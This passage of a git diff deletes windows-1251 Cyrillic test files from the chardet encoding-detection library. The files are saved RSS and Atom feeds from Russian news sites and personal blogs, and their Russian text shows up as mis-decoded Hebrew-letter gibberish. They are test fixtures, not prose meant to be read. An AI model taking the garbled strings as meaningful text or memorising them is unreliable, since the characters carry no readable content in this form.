דנוקוסךמל םא נףססךמל. ֳנוצט. טןנ - http://www.greek.ru - - - - Greek.Ru - http://www.greek.ru/ru/news/ya/grekru.gif - http://www.greek.ru - 88 - 31 - - - - ֳנוצט סודמהם: ְװָֽ ֱ־׀ׁׂ ׁ ֿ׀־ָׁׂׂ׃ײֵָֹ - http://www.greek.ru/ru/news/news_detail.php?ID=994 - ֲכאסעט ְפטם םאקאכט ךאלןאםט‏ "ןמ מדנאםטקוםט‏ ןנמסעטעףצטט ט םוחאךמםםמי אךעטגםמסעט טםהףסענטט סוךסא". - - - - ֳנוצט סודמהם: ֲ ֳנוצטט אנוסעמגאם קועגונמ בנטעאםצוג חא טחבטוםטו גכאהוכצא מהםמדמ טח לאדאחטםמג - http://www.greek.ru/ru/news/news_detail.php?ID=996 - ֲ ֳנוצטט אנוסעמגאם קועגונמ בנטעאםצוג - גסו קכום מהםמי סולט, ךמעמנו סטכםמ טחבטכט גכאהוכצא םובמכרמדמ לאדאחטםקטךא בכטח "עףנטסעטקוסךמי ּוךךט" - אפטםסךמדמ ְךנמןמכ. - - - - - טןנ סודמהם: ׂףנךט-ךטןנטמע ןנוהכאדא‏ע מסגמבמהטע טןנ מע לטם - http://www.greek.ru/ru/news/news_detail.php?ID=990 - ֻטהונ עףנמך-ךטןנטמעמג ׀אףפ ִוםךעאר גסךאחאכס חא כטךגטהאצט‏ לטםםץ ןמכוי גהמכ הולאנךאצטמםםמי כטםטט, נאחהוכ‏שוי מסענמג םא דנוקוסךף‏ ט עףנוצךף‏ קאסעט. - - - - - טןנ סודמהם: ְְָֻׂׂ ְֵֽֽׁ ׃ְִ׀ ֿ־ ָֿ׀׃ 29 ֵֻׂ ְְִַֽ - http://www.greek.ru/ru/news/news_detail.php?ID=952 - ׀וסןףבכטךא טןנ ט גוס דנוקוסךטי לטנ מעלועטכט 20 ט‏כ ענאףנםף‏ האעף סגמוי טסעמנטט. ׀מגםמ 29 כוע םאחאה ג ץמהו מןונאצטט \ No newline at end of file diff --git a/chardet/tests/windows-1251-cyrillic/intertat.ru.xml b/chardet/tests/windows-1251-cyrillic/intertat.ru.xml deleted file mode 100644 index 2e421da..0000000 --- a/chardet/tests/windows-1251-cyrillic/intertat.ru.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -׀וסןףבכטךאםסךא ‎כוךענמםםא דאחועא Intertat.RU׃קנוהטעוכול ְֽ־ ׀ֳ Intertat.RU גכועס ךאבטםוע ּטםטסענמג ׀וסןףבכטךט ׂאעאנסעאם. "Intertat.RU" סמחהאםא ֿמסעאםמגכוםטול ֿנאגטעוכסעגא ׀וסןףבכטךט ׂאעאנסעאם סמדכאסםמ ׃ךאחף ֿנוחטהוםעא ׀ׂ ג 2001 דמהף. ַאנודטסענטנמגאםמ ּטםטסעונסעגמל ןוקאעט ט עוכונאהטמגושאםט ׀װ. ׁגטהועוכסעגמ מ נודטסענאצטט ָּׁ כ \ No newline at end of file diff --git a/chardet/tests/windows-1251-cyrillic/janulalife.blogspot.com.xml b/chardet/tests/windows-1251-cyrillic/janulalife.blogspot.com.xml deleted file mode 100644 index d506909..0000000 --- a/chardet/tests/windows-1251-cyrillic/janulalife.blogspot.com.xml +++ /dev/null @@ -1,165 +0,0 @@ - - - - - - -JaNuLa's L1FE MOMENTS -If you love Her as much as I love Her then you won't steal Her...I never know what the future brings -But I know she'll be here with me...Don't give me names -You've got it all, took it all from me -Drove me insane -Who'd come down to earth, releasing me -Healing my wounds -So why don't you close the door when you're leaving me -Now you'll run -Running all the way back to me again... -ֲסועאךט מם וו ףךנאכ, חםאקטע םו כ‏בטכ... - -tag:blogger.com,1999:blog-11182692 -2005-11-27T14:59:40Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -lucky - -2005-11-20T18:50:00+02:00 -2005-11-20T17:39:14Z -2005-11-20T17:39:14Z - -tag:blogger.com,1999:blog-11182692.post-113250835408580855 -ֿונגי סםוד... ג ‎עמל דמהף -<BODY><A HREF='http://photos1.blogger.com/blogger/7360/820/1024/collage11.jpg'><IMG SRC='http://photos1.blogger.com/blogger/7360/820/400/collage11.jpg' border=0 alt='' style='clear:all;float:left;margin: 0px 10px 10px 0px; cursor:hand'></A>&nbsp;<br /></BODY> ֿונגי סםוד, ךמעמני מבחאעוכםמ המכזום נאסעאע. ־עןנאגכוםםמו סלס -ֽאהו‏ס, ע נאהא ‎עמלף ןונגמלף,בוכמלף, קטסעמלף סםודף :) ןנטםוסכמ ס סמבמי קאס מבשוםט ס כ‏בטלל קוכמגוךמל. ױמקף כט גטהוע עוב ג נולםו? ִא, ךמםוקםמ, םאגונםמו, סךמנמ בףהף, עמקםמ. :) ׂאך םוכוןמ םאסעףןאע םא ‎עמע קטסעי, בוכי סםוזםי ןמךנמג, םו םאץמהטר? ֲסו גמךנףד חא קאס סעאכמ קטסעל ט עאך םוגטםםל...ֽאהמכדמ כט?&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - - -lucky - -2005-11-18T21:57:00+02:00 -2005-11-18T20:04:01Z -2005-11-18T19:57:00Z - -tag:blogger.com,1999:blog-11182692.post-113234382000287438 -ֿנטסכאםמ לםו ןמקטעאע... - חםא‏ לטנ -- מם סעאנ ט ןמכמם הנםט,<br /> חםא‏ ןעטצ, כועשטץ םא לאםמך,<br /> חםא‏, ךאך חגוםטע הוםדא ג ךאנלאםו<br />ָ ךאך חגוםטע מעעמקוםםי ךכטםמך.<br /> חםא‏, ךאך ןמ‏ע םא ‎ראפמעו,<br /> חםא‏, ךאך צוכף‏ע, םו כ‏ב,<br /> חםא‏ עוץ, ךעמ <<חא>> ט עוץ, ךעמ <<ןנמעטג>>,<br /> חםא‏ גסו, םמ עמכךמ םו סוב.<br /><br /> חםא‏ רכ‏ץ -- מםט דמנה, ךאך האל,<br /> חםא‏ האל -- מםט הורוגכו רכ‏ץ,<br /> חםא‏ עמ, מ קול למכקאע דמהאלט,<br /> חםא‏ עמ, קעמ ןנמטחםמסע גסכףץ,<br /> חםא‏, ךאך חונםמ ךכ‏‏ע ןאגכטם<br />ָ ךאך גמנמם ענףן עונובע,<br /> חםא‏ זטחם -- מםא םו בףהוע הכטםםמי,<br /> חםא‏ גסו, םמ עמכךמ םו סוב.<br /><br /> חםא‏ לטנ -- ודמ סףהטע כודךמ םאל,<br />ֲוה גסול המ סמגונרוםסעגא האכוךמ,<br /> חםא‏, ךאך למכקאע ןונוה חאךמםמל,<br />ָ חםא‏, ךאך ןמנמי למכקטע חאךמם.<br /> חםא‏, ךאך חא ץגמסע כמגטע ףהאקף,<br />ֲסוץ נאסעמכךאג ט ךאזהמלף דנףב,<br /> חםא‏ -- עמכךמ עאך, א םו טםאקו...<br /> חםא‏ גסו, םמ עמכךמ םו סוב.<br /><br /><br /> (ס) ־. ֻאהזוםסךטי, 1998<br /><a href="http://lib.ru/OLDI/poez.txt"></a> -false - - - - -lucky - -2005-11-16T03:39:00+02:00 -2005-11-16T01:49:16Z -2005-11-16T01:49:16Z - -tag:blogger.com,1999:blog-11182692.post-113210575690319678 -ֲטה ס למודמ מךםא... -<a href="http://photos1.blogger.com/blogger/7360/820/1024/collage10.jpg"><img style="CLEAR: all; FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/7360/820/400/collage10.jpg" border="0" /></a> <br /><br />...ׁךגמח מןףשוםםו גוךט<br />ֲטזף, גטזף, ע סמ לםמי -<br />ָ ג נףךו עגמוי םאגוךט<br />ֽומעךנעי גוונ למי.<br /><br />־עעמדמ, קעמ סעאכט נהמל<br />ּ ג בכאזוםםי לטד קףהוס.<br />ֲ לטד, ךמדהא םאה ֻועםטל ׁאהמל<br />ּוסצ נמחמגי גמסךנוס -<br /><br />ּםו םו םאהמ מזטהאםטי<br />׃ ןמסעכמדמ מךםא<br />ָ עמלטעוכםץ סגטהאםטי.<br />ְץ! כ‏במג ףעמכוםא.<br /><br />ׂ סגמבמהםא, סגמבמהםא,<br />ַאגענא כףקרו, קול גקונא... <br /><br />ְ.ְץלאעמגא&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - -lucky - -2005-11-07T19:18:35+02:00 -2005-11-07T17:18:35Z -2005-11-07T17:18:35Z - -tag:blogger.com,1999:blog-11182692.post-113138391513670714 -interesno, znaesh' li ty, gde ona seichas? -na samo... - -
    interesno, znaesh' li ty, gde ona seichas?
    na samom dele...
    -Posted by Lucky -
    -
    -false -
    - - - -lucky - -2005-10-10T01:29:46+03:00 -2005-10-09T22:29:46Z -2005-10-09T22:29:46Z - -tag:blogger.com,1999:blog-11182692.post-112889698613197046 -*** - -
    -אך ב ץמעוכמס בע ס עמבמי, ֲס¸ גנול סכראע דמכמס עגמי! ֿנטזאע עוב ך סגמוי דנףהט, סךאחאע: ?ֻ‏בטלא, ןנמסעט!?. ַא דכףןו סכמגא ט במכ, ןנמסעט! ַא הועסךטי סלוץ ט ןמרכו ןנטחםאםט. ִמ עףןמסעט ףןמנםמו למכקאםטו. ָ חא למט םטךק¸לםו סעאנאםט. ֿנמסעט חא ‎עט טהטמעסךטו סעטץט! ָ חא הנףדטו, קעמ ךמדהא-עמ בףהףע! ֿנמסעט חא םוסגונר¸םםו דנוץט, ַא םוסגונר¸םםמו םו סףהע! ֿנמסעט, קעמ וסע םא חולכו. ֿנמסעט! ָ, וסכט גהנףד םו בףהוע? ֿנמסעט, קעמ ןמלם‏ מ עובו! ֿנמסעט, קעמ סונהצו םו חאבףהוע!? -
    -
    -false -
    - - - - -lucky - -2005-10-07T23:22:00+03:00 -2005-10-09T22:30:22Z -2005-10-07T20:22:54Z - -tag:blogger.com,1999:blog-11182692.post-112871657428923627 -no title - -
    Xxxx (10:29 PM) :
    הא, ט ןנטץמהטעס הגטדאעס האכרו..
    Fallen_Angel (10:30 PM) :
    נאחגו קעמ ןנמסעמ הגטדאעס (רטנעס):-)
    ף עוב וסע גסו...ט ‎עמדמ גסודמ םו םאהמ...בוח
    Fallen_Angel (10:30 PM) :
    גסו עאך עונוע גסךטי סלסכ: ף קולף סענולטכס, מ קול לוקעאכ...
    Xxxx (10:31 PM) :
    ע ןמעונכא כ‏בטלמדמ קוכמגוךא?
    Fallen_Angel (10:32 PM) :
    אדא, ף לום ודמ ןנמסעמ ףגוכט: עאך באםאכםמ..
    חםאור ךאך? עףןמ..קונוח אסךף... המ סטץ ןמנ םו למדף ןמםע...
    Fallen_Angel (10:33 PM) :
    א קעמ םו למדף ןמםע- ןנמסעמ םו למדף ןנמוץאע, ךאך ע דמגמנטר הגטדאעס האכרו:
    ןנמסעמ-סכמזםמ םו ןמםטלא‏...
    Xxxx (10:34 PM) :
    ׂמדהא םו ףבטגאיס, עמע, ךמדמ למזםמ ףגוסעט, םו לםמדמדמ סעמטע. ׂגמי דכאגםי לףזקטםא זה¸ע עוב גןונוהט, נאהט םודמ םףזםמ טהעט האכרו....
    Fallen_Angel (10:34 PM) :
    עאך גסו ןונוקונךםףעמ... בכא ֲסוכוםםמי,
    Fallen_Angel (10:35 PM) :
    חםאור ג קול ןנטךמכ...‎עמ םו בכ לףזקטםא...
    גהמץםט....לםו טםעונוסםא נואךצט...:-)
    Fallen_Angel (10:36 PM) :
    ‎עמ בכא למ סףהבא...
    Fallen_Angel (10:36 PM) :
    ‎עמ עאך חםא‏....
    Fallen_Angel (10:36 PM) :
    בוח דאהאםטי םאגונםךא...
    Xxxx (10:36 PM) :
    םו גאזםמ..
    ֽאחמגול ןנמסעמ כ‏בטלל קוכמגוךמל
    Fallen_Angel (10:37 PM) :
    חםאור, עסקף נאח דמגמנטכא חא 4 דמהא "כ‏בכ‏"
    א דכףבטםף סלסכא מסמחםאכא, עמכךמ ךמדהא מםא טסקוחכא ס למוי זטחםט....
    עאך סענאםםמ...
    Xxxx (10:39 PM) :
    עמדהא כ‏בט האכרו, כ‏בט גסודהא,
    גוה םאסעמשא כ‏במג םו ענובףוע םאדנאה ט ןממשנוםט
    Fallen_Angel (10:40 PM) :
    ןונגי קוכמגוך, ךמעמני ןמםכ, קעמ כ‏בכ‏ וו םו סלמענ םט םא קעמ!
    גסו הנףדטו דמגמנע- חאבףה, םאקעט זטחם חאםמגמ ט ע.ה.:-(
    עאך סךףקא‏ ןמ םוי...
    -
    Fallen_Angel (10:41 PM) :
    עאך םו למדף נאחלוםעס םא כטצא, ג ךמעמנץ םוע וו...
    Fallen_Angel (10:42 PM) :
    מםא חאךאחאכא לום ג צוכטעוכםטצ, קעמב לום גכוקטכט מע םוו...
    Fallen_Angel (10:43 PM) :
    קעמב חאבכא, קעמב לםו םו בכמ עאך במכםמ...
    Fallen_Angel (10:43 PM) :
    מםא םו ןמםטלאוע...
    Xxxx (10:43 PM) :
    ֽאשוע ֻטכטע- ‎עמ קונםא כףםא
    עאך זו סךףקא‏ מב ףענאקוםםמל לםמי קוכמגוךו, םמ לםו םטקודמ םו מסעאועס, ךאך עמכךמ למכטעס מ ם¸ל...
    -
    Xxxx (10:45 PM) :
    ַםאי, קעמ םטךאךא במכ םו הכטעס גוקםמ.
    Fallen_Angel (10:45 PM) :
    חםאור, לטנ סעאםמגטעס עאך בוחסלסכום, דנףב ט םוגםמסטל, ךמדהא ןנמטסץמהע גושט גנמהו ‎עטץ...
    Fallen_Angel (10:45 PM) :
    באנאם...גונםוו עוכוצ נמזהוםםי ג דמה בךא...ף לום ‎עמ ףזו ס פוגנאכ לוסצא...
    Fallen_Angel (10:47 PM) :
    ןנמסעמ טדנא‏ ג רמף : סאלף סוב סקאסעכטגף‏ םא כ‏הץ...
    המלמי גמחגנאשאעס ןנמסעמ םוגםמסטלמ....
    Fallen_Angel (10:48 PM) :
    מםא מסעאגטכא גסו עמ, קעמ עאך כ‏בטכא...
    Xxxx (10:48 PM) :
    ןנמסעמ ףכבםטס,
    וסכט ע כ‏בטר, המכזום בע סגוע, כ‏בגט םו בגאוע בוח סגועא, האזו וסכט במכםמ
    Xxxx (10:49 PM) :
    ט סךאזף עובו םא ףרךמ:
    ֲׁׂ׀ױָֽׁ ט ןונוסעאם סוב זאכוע
    Fallen_Angel (10:49 PM) :
    o'k... ג סאלמל הוכו ףכבא‏ס: נאהא ךאזהמלף סמכםוקםמלף\המזהכטגמלף הם‏...
    כ‏במי לוכמקט, םמ ‎עמ גסו םו עמ בוח םוו: ןאנאככוכםמ זטגף סאלא ס סמבמי... םו חםא‏ ךאך ‎עמ מבסםטע...
    םטךעמ סוב םו זאכווע...
    Fallen_Angel (10:50 PM) :
    ף לום גסו וסע, אבסמכ‏עםמ סאלמהמסעאעמקםי קוכמגוך...לםו םטקודמ םו םאהמ בוח טלוםםמ םוו...
    Xxxx (10:51 PM) :
    וסע ראםס, קעמ מםא גונם¸עס?
    Fallen_Angel (10:52 PM) :
    םו חםא‏, מםא דמגמנטע, קעמ כ‏בטע לום. םמ ףזו ןמ-הנףדמלף...
    םו גונ‏ םט והטםמלף וו סכמגף...גסודמ עאך לםמדמ, קעמ למזםמ ןטסאע בוסעסוככונ...
    Fallen_Angel (10:53 PM) :
    מםא ןנמסעמ סןאכטכאס. ןנמסעמ למדכא םטקודמ םו ףחםאע, למזוע בע מםא ב האזו סויקאס בכא ב המלא...
    טםמדהא הףלא‏, סעמטכמ כט לםו כוחע ג וו ךמלן...
    Fallen_Angel (10:53 PM) :
    גונםוו ג למי, ךמעמנל מםא ןמכחמגאכאס....
    Fallen_Angel (10:54 PM) :
    ןמעמל, מםא הםלט למזוע םא בנאע סמעמגי...
    Fallen_Angel (10:55 PM) :
    ןמעמל ןנמסעמ ןמחגמםטע ט סןנמסטע ךאך ף לום הוכא?:-)
    Fallen_Angel (10:55 PM) :
    לום םאקטםאוע ךכטםטע עאך, קעמ םו למדף סךאחאע ט סכמגא...
    Fallen_Angel (10:56 PM) :
    מםא עמדהא ףבוזהאועס. קעמ וי םו סעמטכמ חגמםטע ....בנוה...
    ץמקף הנףדמי דכמבףס....
    Xxxx (10:56 PM) :
    גאל םאהמ נאחמבנאעס לוזהף סמבמי,
    לםו במכרו םוקודמ סךאחאע ...
    -
    Fallen_Angel (10:56 PM) :
    ןמ טהוו מםא בףהוע זטע ג עגמול דמנמהו...
    Fallen_Angel (10:57 PM) :
    ל סעמ נאח נאחבטנאכטס...מםא כ‏בטע םאס הגמטץ...‎עמדמ ךְחכא ט לום...
    Fallen_Angel (10:58 PM) :
    קףגסעגמ גטם לוראוע וי גונםףעס: מםא הףלאוע, קעמ נאםמ טכט ןמחהםמ טלוםםמ טח=חא ‎עמדמ ל ג טעמדו נאחמיהולס...
    Fallen_Angel (10:59 PM) :
    חםאור, ןמחגמםטכא ודמ נמהטעוכל ג ֿ...
    Fallen_Angel (11:00 PM) :
    לםו עאך גאזםמ בכמ חםאע, ךאך מםט מעםמסעס ך עמלף, קעמ טץ סם "גמחזוכאכ זוםף בכטזםודמ סגמודמ" חםא מ עמל, ךאך ‎עמע בכטזםטי סענאהאוע מע ‎עמדמ, ט חםאור קעמ?
    Fallen_Angel (11:04 PM) :
    ודמ לאלמקךא טסןףדאכאס, ןמחגאכא ןאןמקךף, ןאןא ס לאעאלט לום ןמסכאכ ט סךאחאכ, קעמ מם סעמ נאח גכאחטכ ג קףזטו זטחםט ט עמכךמ דמנהטעס ‎עטל, ןמסמגועמגאכ לםו ןנמענוחגוע, ץמע םו ן‏ גממבשו...םף, ג מבשול ֶוםךא ג ץמנמרטץ נףךאץ...
    Fallen_Angel (11:04 PM) :
    ‎עט כ‏הט סאלט הוכא‏ע ‎עמע לטנ עאךטל םוגםמסטלל...
    -
    -false -
    - - - - -lucky - -2005-07-11T00:11:33+03:00 -2005-07-10T21:11:33Z -2005-07-10T21:11:33Z - -tag:blogger.com,1999:blog-11182692.post-112102989342403583 -ׁןטסמך סקאסעכטגקטךא - -
    צטםטחל -
    ‎דמטחל -
    סטכםמו ףהמגכועגמנוםםמו זוכאםטו סוךסא (םוכ‏בגט) -
    אסמצטאכםמסע -
    קנוחלונםו ענובמגאםט ך בכטחךטל -
    מזוסעמק¸םםמו נאגםמהףרטו ך מךנףזא‏שטל -
    ץאמעטקםמסע ט ןונולוםקטגמסע ןמבףזהוםטי -
    מעסףעסעגטו ספמנלטנמגאםםץ למנאכםץ ףסעאםמגמך -
    בוססטכםמו בוחנאחכטקטו ך גרוןונוקטסכוםםמלף -
    -
    אך עמכךמ גךטהגא‏ קוכמגוךא טח סגמוי זטחםט ...מם ןמגכועס..:) -
    ט גסו םאקטםאועס סםמגא:)ּ קאסעמ מענוךאולס מע ךמדמ-עמ, מענוחאול סנאחף, הףלא, קעמ עאך לוםרו במכט.ּ חאךנגאול הגונט םאדכףץמ,ךאך ךטנןטקםא סעוםא טכט ןעאולס ףךאחאע םא םוו ךאך בףהעמ ג םוו למזםמ גיעט. -
    ּ ףץמהטל ט םו מבמנאקטגאולס, ץמע םא סאלמל הוכו וש¸ המכדמ לסכוםםמ עאל םאץמהטלס. -
    ׂשועםמ ןעאולס מעמנגאעס מע עוםט, םמ ןמםטלאול, קעמ מע םו¸ םו טחבאגטעס, למזםמ כטר םו מבנאשאע גםטלאםט םא םו¸ טכט ןמילאע םמגף‏.. -
    ךאך ןמםנאגטעס....ֿנמרכמו ןנמסעטע ס ןמסכוהף‏שטל חאבגוםטול... -
    טכט -
    ֽטךמדהא םו בע ןנמשוםםל.. םמ ט גוקםמ םו חאבעל... -
    ט םו ןנמסעטע ט גוקםמ םו חאבע...ָ םטךמדהא במכרו םו חאבמכוע םוטחכוקטלמי במכוחם‏, ך ךמעמנמי ףזו גנאבמעאם סעמיךטי טללףםטעוע, טהעט ןמ זטחםל םמגץ עוםוי סךמכח ט םו סגחאםמ בכטחךמ,ןמםטלא, קעמ םטקודמ עאךמדמ םט ג ךמל םוע, ךאך ‎עמדמ םו בכמ ט המ ‎עמדמ, גסו ןנטהףלאםמ ט טהואכטחטנמגאםמ ןנמסעמ ג למחדאץ.ּמחד קוכמגוךא המ סטץ ןמנ גמסלמו קףהמ סגועא,עול במכוו למט. -
    -
    -
    -false -
    -
    diff --git a/chardet/tests/windows-1251-cyrillic/kapranoff.ru.xml b/chardet/tests/windows-1251-cyrillic/kapranoff.ru.xml deleted file mode 100644 index 8a927de..0000000 --- a/chardet/tests/windows-1251-cyrillic/kapranoff.ru.xml +++ /dev/null @@ -1,161 +0,0 @@ - - - - - -Kappa's Lair v2.0 -http://kapranoff.ru/ - -en-us - -2003-12-18T17:40:29+03:00 - - - - - - - - - - - - - - - - - - - - - - - - - -ןףכ‏ל-ןףכ‏ל -http://kapranoff.ru/archives/003663.html - - -kappa -2003-12-18T17:40:29+03:00 - - -װמכךכמנ -http://kapranoff.ru/archives/003662.html - - -kappa -2003-12-18T15:46:04+03:00 - - -<![CDATA[ְ ג דמגמנטעו — הםוגםטךט...]]> -http://kapranoff.ru/archives/003661.html -׃םטךאכםי, םא למי גחדכה, ןנמהףךע ךמככוךעטגםמדמ עגמנקוסעגא. םטדא צוכא. ֽו ןמזאכוועו. מרךט לרךמי. ־הםאזה סמכםוקםמי ןמנמי, ֱכ הום המזהכטג ט... - -kappa -2003-12-17T16:54:58+03:00 - - -ּף‎םהמכטםא -http://kapranoff.ru/archives/003660.html -׀ףססךטי סאיע מ דףבםץ דאנלמרךאץ ט טדנו םא םטץ. איפ. ִאגםמ ץמעוכ םאןטסאע מ ם¸ל, הא גמע חאבגאכ גס¸. Lonesome... - -kappa -2003-12-17T13:49:03+03:00 - - -ךאלב‎ך -http://kapranoff.ru/archives/003659.html -ַהנאסעו גאל ס ץגמסעטךמל. למד ב לםמדמ םאןטסאע מ עמל, קול חאםטלאכס גס‏ ‎עף םוהוכ‏. ּםו כום. ־גקטםךא םו... - -kappa -2003-12-17T13:42:39+03:00 - - -ול בע? -http://kapranoff.ru/archives/003657.html -ׁבנוםהטכ, גטהטלמ, גאר ןמךמנםי ס ףלא סמגסול מע בוחהוכ. ׁטזף גמע, ענאקף בוחףלםו הוםדט ג בנםסךמל טםעונםועו, ןנמץמזף עוסע םא... - -kappa -2003-12-13T12:15:13+03:00 - - -ִום ךמםסעטעףצטט -http://kapranoff.ru/archives/003656.html -׳וכמגוקוך, ךמעמני סהוכאכ לום לוכמלאםמל, סודמהם מעלוקאוע סגמ¸ הוםנמזהוםטו :) ׃נא, עאך ןמכאדא‏, הא גוה? ֿמסגשא‏ וי גץמה געמנמדמ... - -kappa -2003-12-12T15:18:10+03:00 - - -כעהבנ -http://kapranoff.ru/archives/003655.html - - -kappa -2003-12-09T17:51:23+03:00 - - -ׁאלמו מםמ -http://kapranoff.ru/archives/003646.html - - -kappa -2003-12-07T23:09:31+03:00 - - -ׁןמנע-ךסןנוסס סממבשאוע -http://kapranoff.ru/archives/003654.html - - -kappa -2003-12-06T18:19:27+03:00 - - -ַולכםו-3 -http://kapranoff.ru/archives/003653.html - ִוגמקךא ט האכאי-כאלא. ֳוםטאכםמ. ַהוס גס¸.... - -kappa -2003-12-05T13:34:08+03:00 - - -ּףחךא ס םאלט -http://kapranoff.ru/archives/003652.html - ףןטכ גמע. ֿמנאהמגאכ סעאנטךא. ׁוב.... - -kappa -2003-12-04T19:56:54+03:00 - - -ֽמגמסעום -http://kapranoff.ru/archives/003651.html -ְ ףסאעי ׀וגךטם סמ עמגאנטשט חאךאםקטגאוע חאןטס םמגמדמ אכבמלא. ֲ סףבבמעף מםט, ךסעאעט, בףהףע ג ײִױ. למזוע בע סץמזף.... - -kappa -2003-12-04T18:58:46+03:00 - - -ׁטםטי גמכ, טסןמכםוםםי מקוי -http://kapranoff.ru/archives/003650.html -ֱֳ מ גסךמל נאחםמל. ֿמילטעו, וסע , ןטרף ןוסםט, טץ ןמ‏, ף לום וסע סגמ ‎סעועטךא. ָ וסע... - -kappa -2003-12-03T22:44:54+03:00 - - -גזטך-גזטך -http://kapranoff.ru/archives/003649.html -ְ , לוזהף עול, גונםףכס טח ֱנםסךא. ׂאךטו הוכא.... - -kappa -2003-12-03T11:37:49+03:00 - - - - diff --git a/chardet/tests/windows-1251-cyrillic/money.rin.ru.xml b/chardet/tests/windows-1251-cyrillic/money.rin.ru.xml deleted file mode 100644 index f942c11..0000000 --- a/chardet/tests/windows-1251-cyrillic/money.rin.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - -ךמםמלטךא ט פטםאםס -http://money.rin.ru -ךמםמלטקוסךטו ט פטםאםסמגו םמגמסעט -ru-ru -Copyright 2003, Greenline, Kazan, Russia -Wed, 04 Jan 2006 02:20:05 GMT -Wed, 04 Jan 2006 02:20:05 GMT -http://backend.userland.com/rss091 -money@rin.ru -webmaster@dionys.pp.ru - - -ֵָׁׁׂ םו ףעגונהטכא ךגמע םא ‎ךסןמנע קונםמי טךנ ט מסוענמגץ -http://money.rin.ru/content/news/?id=106325&from=rss -ׁוךנועאנטאע מםגוםצטט מ לוזהףםאנמהםמי עמנדמגכו הטךטלט גטהאלט פאףם ט פכמנ, םאץמהשטלטס ןמה ףדנמחמי טסקוחםמגוםט (ֵָׁׁׂ), חאגטכ גמ געמנםטך, קעמ םו סלמזוע ףעגונהטע ךגמע םא ‎ךסןמנע קונםמי טךנ ט מסוענמגץ םא 2006 דמה המ עוץ ןמנ, ןמךא סענאם-ןנמטחגמהטעוכט םו ןנוהמסעאגע ןמכםף‏ טםפמנלאצט‏ מ סמסעמםטט ןמןףכצטט מסוענמגץ. - - - -ֲגוהום לוזהףםאנמהםי חאןנוע םא ‎ךסןמנע קונםמי טךנ -http://money.rin.ru/content/news/?id=106324&from=rss -ֲגוהום לוזהףםאנמהםי חאןנוע םא ‎ךסןמנע קונםמי טךנ. אך ןונוהאוע "ץמ ּמסךג", ‎עמ נורוםטו ןנטםעמ ג ֶוםוגו םא חאסוהאםטט לוזהףםאנמהםמי מנדאםטחאצטט ןמ עמנדמגכו דנמחשטלט טסקוחםמגוםטול גטהאלט פכמנ ט פאףם (CITES). - - - -ֿנמבכולא ןנמץמזהוםט דנאםטצ עףנטסעטקוסךטלט אגעמבףסאלט, סכוהף‏שטלט טח ׀מססטט ג ֵגנמןף, נורוםא -http://money.rin.ru/content/news/?id=106323&from=rss -ֿנמבכולא ןנמץמזהוםט דנאםטצ עףנטסעטקוסךטלט אגעמבףסאלט, סכוהף‏שטלט טח ׀מססטט ג ֵגנמןף, נורוםא. אך סממבשטכט ג ׀מססטיסךמל סמ‏חו עףנטםהףסענטט, ס 1 םגאנ 2006ד. ג ֱוכמנףססטט מעלום‏עס גסו לוסעםו סבמנ ןנט ןונוסוקוםטט דנאםטצ. - - - -ֿףעטם ןמהןטסאכ חאךמם מ גםוסוםטט טחלוםוםטי ג ׂאלמזוםםי ךמהוךס ׀װ -http://money.rin.ru/content/news/?id=106322&from=rss -ֿנוחטהוםע ׀מססטט ֲכאהטלטנ ֿףעטם ןמהןטסאכ פוהונאכםי חאךמם "־ גםוסוםטט טחלוםוםטי ג סעאעט 147 ט 388 ׂאלמזוםםמדמ ךמהוךסא ׀מססטיסךמי װוהונאצטט", ןנטםעי ֳמסהףלמי 23 הוךאבנ ט מהמבנוםםי ׁמגועמל װוהונאצטט 27 הוךאבנ 2005 דמהא. - - - -"ְֳַֿ׀־ּ" ֿ׀ֵ׀ְָֻׂ ֿ־ְֲָׁׂ ְְֳַ ְֽ ׃׀ְָֽ׃ -http://money.rin.ru/content/news/?id=106321&from=rss -ׁודמהם םאקטםא ס 10.00 ג סגחט ס מעךאחמל ְֽ"ֽאפעמדאח ׃ךנאטם" מע ןמהןטסאםט ךמםענאךעא םא ןמסעאגךף דאחא ג 2006 דמהף, ־ְ־"ֳאחןנמל" ןנוךנאעטכמ ןמסעאגךף דאחא ןמענובטעוכל ׃ךנאטם. ׁממעגועסעגף‏שוו ןנוהףןנוזהוםטו בכמ מפטצטאכםמ םאןנאגכוםמ ףךנאטםסךמי סעמנמםו 31 הוךאבנ 2005 דמהא. - - - -ֲגמהעס םמגו ןנאגטכא ןונוסוקוםט דנאםטצ סמ סענאםאלט ֱאכעטט -http://money.rin.ru/content/news/?id=106320&from=rss -ָחלוםוםט ג ןמנהךו ןונוסוקוםט דנאםטצ סמ סענאםאלט ֱאכעטט גגמהעס ס 1 םגאנ 2006 דמהא. אך סממבשטכט ׀ְָ ֽמגמסעט ג ִָּ ׀מססטט, ןנט ענאםחטעו קונוח עוננטעמנט‏ ֻטעג ג אכטםטםדנאהסךף‏ מבכאסע ט טח מבכאסעט ס 2006 דמהא ןנוךנאשאועס הויסעגטו חאדנאםטקםמדמ ןאסןמנעא ׁׁׁ׀. - - - -ׁ 1 םגאנ גסעףןאוע ג סטכף חאךמם מב מסמבץ ‎ךמםמלטקוסךטץ חמםאץ -http://money.rin.ru/content/news/?id=106319&from=rss -ׁ 1 םגאנ גסעףןאוע ג סטכף חאךמם מב מסמבץ ‎ךמםמלטקוסךטץ חמםאץ (־ַ), ןנוהףסלאענטגא‏שטי עאלמזוםםו ט םאכמדמגו כדמע הכ נוחטהוםעמג ‎עטץ חמם. ׁמדכאסםמ חאךמםא, ג ׀מססטט בףהףע סמחהאם ־ַ הגףץ עטןמג: ןנמלרכוםםמ-ןנמטחגמהסעגוםםו ט 